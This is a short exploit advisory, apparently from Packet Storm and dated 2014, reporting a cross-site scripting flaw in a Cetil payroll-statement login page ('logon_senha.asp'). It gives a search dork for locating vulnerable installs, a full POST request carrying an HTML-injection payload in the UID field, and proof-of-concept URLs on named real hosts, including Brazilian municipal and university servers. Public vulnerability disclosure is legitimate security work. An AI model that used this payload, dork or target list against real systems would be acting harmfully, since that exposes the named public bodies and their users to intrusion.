Software made by Cetil but now distributed for free by the Brazilian government suffers from a cross site scripting vulnerability. Note that this finding houses site-specific data.
43b8dc21aeb405e4b5208b0ce417048266d66db58b7bb5799ac9cdca9d81eaf1[+] Post Cross Site Scripting on Cetil - Demonstrativo de Pagamento de Salário
[+] Date: 27/05/2014
[+] Risk: LOW
[+] CWE number: CWE-79
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://www.cetil.com.br/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: logon_senha.asp
[+] Dork: CETIL - Demonstrativo de Pagamento de Salário
[+] Exploit : http://host/patch/logon_senha.asp
UID=%3Cmarquee%3Efelipe+andrian+peixoto&senha=teste&Submit=ok
[+] Example:
POST /gpweb/logon_digitado.asp HTTP/1.1
Host: gpweb.unitau.br:88
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://gpweb.unitau.br:88/gpweb/logon_senha.asp
Cookie: ASPSESSIONIDSCSTDSCD=CAFFKGICPDHEPMAAEDBKCJIK
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
UID=%3Cmarquee%3Efelipe+andrian+peixoto&senha=teste&Submit=ok
[+] PoC : http://gpweb.unitau.br:88/gpweb/logon_senha.asp
http://www.saosebastiao.sp.gov.br/gpcetilweb/logon_senha.asp
http://201.38.74.75/gpweb/logon_senha.asp
http://holerite.apucarana.pr.gov.br/logon_senha.asp
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed